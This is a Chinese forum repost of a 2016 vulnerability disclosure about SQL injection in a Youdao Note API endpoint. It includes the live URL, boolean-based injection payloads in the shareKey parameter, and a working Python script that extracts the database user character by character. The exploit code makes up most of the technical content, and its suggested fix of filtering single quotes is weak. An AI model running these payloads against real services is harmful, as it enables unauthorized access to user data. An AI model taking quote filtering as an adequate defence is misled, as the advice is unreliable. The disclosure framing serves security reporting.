HanDs
NO.2

[7月漏洞公开] 有道云笔记某站SQL注入(附验证脚本) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

淘宝买了袋狗粮,店家送了些试吃装的小袋,我随手放宿舍桌上然后上班去了。回来发现没了,遂问宿舍二货同事,结果告诉我被他吃了,还告诉我小饼干挺香,就是味道有点淡。

详细说明:

code 区域
桃山赵子龙你好啊







code 区域
false



length18.png





code 区域
true
http://note.youdao.com/yws/mapi/xueba?method=getNote
post data: shareKey=017f6d10f48ea433c8872e7dfe431da8' or length(user())=19 and 'x'='x

可以看出这个库是有用户数据的...看在你们安全中心linux小王子的面子上不跑数据了....哈哈哈





length19.png







漏洞证明:

bg.png





code 区域
当前user()为:[email protected]





code 区域
测试脚本如下

#-*- coding:utf-8 -*-
import requests

payload = list('qwertyuiopasdfghjklzxcvbnm1234567890-@. _')

headers = {
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0'
}

user = ''
for x in range(1,20):

for y in payload:
url = 'http://note.youdao.com/yws/mapi/xueba?method=getNote'

data = "shareKey=017f6d10f48ea433c8872e7dfe431da8' or substring(user(),%d,1)='%s' and 'x'='x" % (x,y)

try:
response = requests.post(url=url,data=data,verify=False,headers=headers,timeout=5)

if '@163.com' in response.content:
user += y
print 'User()第 '+repr(x)+' 位是:'+y+' Payload: '+data
except Exception,e:
pass
print '当前user()为:'+user

修复方案:

过滤单引号


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
有道 笔记 S QL
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组